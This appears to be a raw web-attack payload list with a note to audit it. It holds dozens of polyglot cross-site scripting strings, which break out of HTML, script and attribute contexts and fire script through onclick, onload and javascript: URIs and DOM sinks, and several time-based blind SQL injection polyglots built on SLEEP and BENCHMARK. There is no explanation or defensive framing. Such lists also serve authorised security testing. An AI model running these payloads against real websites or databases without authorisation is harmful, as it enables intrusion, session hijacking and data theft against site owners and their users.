# Need to audit these and pick out the good stuff

# XSS
" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
%09 /</title/'/</style/</script/--><p" %0D %0A onclick=alert()//>*/alert()/*
%09 javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
%09/</title/'/</style/</script/--><p"%0D%0Aonclick=alert()//>*/alert()/*
%09javascript://'/</title></style></textarea></script>--><p"%0D%0Aonclick=alert()//>*/alert()/*
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
(/* */oNcliCk=alert() )
--></script></title></style>"/</textarea><a' %0A onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a'%0Aonclick=alert()//>*/alert()/*
/*-/*`/*\`/*'/*"/**/
//%0D%0A%0D%0A//
//'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
//'/</title></style></textarea></script>--><p"%0D%0Aonclick=alert()//>*/alert()/*
/</title/'/</style/</script/--><p" %0A onclick=alert()//>*/alert()/*
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
/</title/'/</style/</script/--><p"%0Aonclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" %0A onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p"%0Aonclick=alert()//>*/alert()/*
<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e-->
</script><script src="https://static.jsbin.com/js/render/edit.js?3.35.11"></script><script>jsbinShowEdit && jsbinShowEdit({"static":"https://static.jsbin.com","root":"https://jsbin.com"});</script><script>
</stYle/</titLe/</teXtarEa/</scRipt/--!>
<a href="jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e">click me</a>
<div>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</div>
<iframe src="jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e"></iframe>
<img border=3 alt=jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e>
<input type='text' value='jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'></input>
<input type=text value=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e></input>
<math xlink:href="jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e">click me</math>
<script>/* \n{{ %09 javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*}} \n*/</script>
<script>/*\n{{%09javascript://'/</title></style></textarea></script>--><p"%0D%0Aonclick=alert()//>*/alert()/*}}\n*/</script>
<script>/*jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e*/</script>
<script>//jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</script>
<style>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</style>
<textarea>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</textarea>
\x3csVg/<sVg/oNloAd=alert()//>\x3e
avascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
avascript://'/</title></style></textarea></script>--><p"%0D%0Aonclick=alert()//>*/alert()/*
jaVasCript:/*-/*`/*\`/*'/*"/**/( oNmouseover=alert() )//%0D%0a%0d%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
jaVasCript:/*-/*`/*\`/*'/*"/**/(/**/oNcliCk=alert())//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
jaVasCript:/*-/*`/*\`/*'/*"/**/(/**/oNcliCk=alert())//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
jaVasCript:/*-/*`/*\`/*'/*"/**/(oNmouseover=alert())//%0D%0a%0d%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
jaVasCript:/-/%60/%5C%60/'/%22//(/%20*/oNcliCk=alert()%20)//%250D%250A%250D%250A//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%3CsVg/%3CsVg/oNloAd=alert()//%3E%3E
jaVasCript://</stYle/'/</titLe/</teXtarEa/</scRipt/-->*/<alert()/*" %0A oNcliCk=alert()//>x
jaVasCript://</stYle/'/</titLe/</teXtarEa/</scRipt/-->*/<alert()/*"%0AoNcliCk=alert()//>x
javascript:/*--></title></style></textarea></script><svg/onload=click() onclick='+/" /+/ onmouseover=1/+/[*/[]/+alert()//'>
javascript:/*--></title></style></textarea></script><svg/onload=click()onclick='+/"/+/onmouseover=1/+/[*/[]/+alert()//'>
javascript://'//" %0A --></textarea></style></script></title><b onclick= %0A alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://'//"%0A--></textarea></style></script></title><bonclick=%0Aalert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p"%0Aonclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p"%0D%0Aonclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' %0A onclick=alert()//>a
javascript://--></script></title></style>"/</textarea>*/<alert()/*' %0D %0A onclick=alert()//>a
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://--></script></title></style>"/</textarea>*/<alert()/*'%0Aonclick=alert()//>a
javascript://--></script></title></style>"/</textarea>*/<alert()/*'%0D%0Aonclick=alert()//>a
javascript://--></title></style></textarea></script><svg "//' %0D %0A onclick=alert()//
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
javascript://--></title></style></textarea></script><svg"//'%0D%0Aonclick=alert()//
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' %0D %0A onclick=alert()//>/
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title>"/</script></style></textarea/-->*/<alert()/*'%0D%0Aonclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' %0D %0A onclick=alert()//>*/alert()/*
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://</title></style></textarea>--></script><a"//'%0D%0Aonclick=alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" %0A '*/alert()/*', onclick=alert()//
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript://</title></textarea></style></script--><li'//"%0A'*/alert()/*',onclick=alert()//
javascript:alert()//"//' %0D %0A onclick=alert()//--></style></script><script>alert()</script>*/alert()/*
javascript:alert()//"//'%0D%0Aonclick=alert()//--></style></script><script>alert()</script>*/alert()/*
javascript:alert()//';alert();'";alert()//</script> onclick=alert() --></title><script>alert()</script>*/alert() /*
javascript:alert()//';alert();'";alert()//</script>onclick=alert()--></title><script>alert()</script>*/alert()/*
javascript:alert()//*/alert()/*</style></title></script>--><body onload=alert()>'"; onclick=alert() %0D %0A alert()
javascript:alert()//*/alert()/*</style></title></script>--><bodyonload=alert()>'";onclick=alert()%0D%0Aalert()
javascript:alert()//--></script></textarea></style></title><a"//' %0D %0A onclick=alert()//>*/alert()/*
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* %0D %0A
javascript:alert()//--></script></textarea></style></title><a"//'%0D%0Aonclick=alert()//>*/alert()/*
javascript:alert()//--></script></textarea></style></title><a"//'onclick=alert()//>*/alert()/*
javascript:alert()//--></script></textarea></style></title><a"//'onclick=alert()//>*/alert()/*%0D%0A
javascript:alert()//</title></style></script>-->";alert()//*/alert()/*<a ';alert()//\' onclick=alert()//> %0D %0A alert()//
javascript:alert()//</title></style></script>-->";alert()//*/alert()/*<a';alert()//\'onclick=alert()//>%0D%0Aalert()//
javascript:alert()//</title></textarea></style></script --><svg '//" %0D %0A onclick=alert()//>
javascript:alert()//</title></textarea></style></script--><svg'//"%0D%0Aonclick=alert()//>
javascript:alert(1)//'//"//</script><script>alert(1)</script>--><div %0D %0A onclick=alert(1)//*/alert(1)/*>
javascript:alert(1)//'//"//</script><script>alert(1)</script>--><div%0D%0Aonclick=alert(1)//*/alert(1)/*>
javascript:alert(1)//}</style></title></textarea></script>--><button '" onclick=alert(1)//>*/alert()/*
javascript:alert(1)//}</style></title></textarea></script>--><button'"onclick=alert(1)//>*/alert()/*
javascript:alert(1);"; onclick=alert(1);// '; onclick=alert(1);//--></style></script><button onclick=alert(1);>
setTimeout(location.search.slice(1));
var data = "jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e";document.documentElement.innerHTML = data;
var data = "jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e";document.head.outerHTML = data;
var data = "jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e";document.write(data);document.close();
var str = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e";
var str = 'jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e';
“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//

# SQLi
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/'
SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample
SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/

